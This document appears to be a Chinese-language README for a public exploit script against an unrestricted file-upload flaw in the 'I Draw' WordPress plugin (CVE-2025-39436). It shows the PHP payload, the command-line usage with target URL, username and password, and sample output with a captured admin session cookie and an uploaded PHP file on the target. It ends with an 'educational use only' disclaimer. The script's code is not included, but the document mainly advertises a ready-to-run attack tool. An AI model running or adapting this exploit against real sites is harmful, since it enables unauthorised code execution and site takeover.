在“I Draw”WordPress 插件中存在一个危险类型文件的不受限制上传漏洞。此漏洞允许攻击者不受限制地上传恶意文件。该问题影响 I Draw 版本 1.0 及之前版本。
该漏洞利用插件的文件上传功能来执行 PHP 有效载荷。以下是使用的默认有效载荷:
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD
options:
-h, --help 显示此帮助信息并退出
-u, --url URL 目标网站 URL
-un, --username USERNAME
用户名
-p, --password PASSWORD
密码
[✅] 登录成功。
[🍪] 此处 Cookies:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[✅] 文件上传成功:
[🔗] http://target/wp-content/uploads/2025/4/19/nxploit.php
此脚本仅供教育目的使用。作者对因使用此漏洞造成的任何滥用或损害不承担任何责任。请自行承担风险。
作者:Nxploited ( Khaled Alenazi )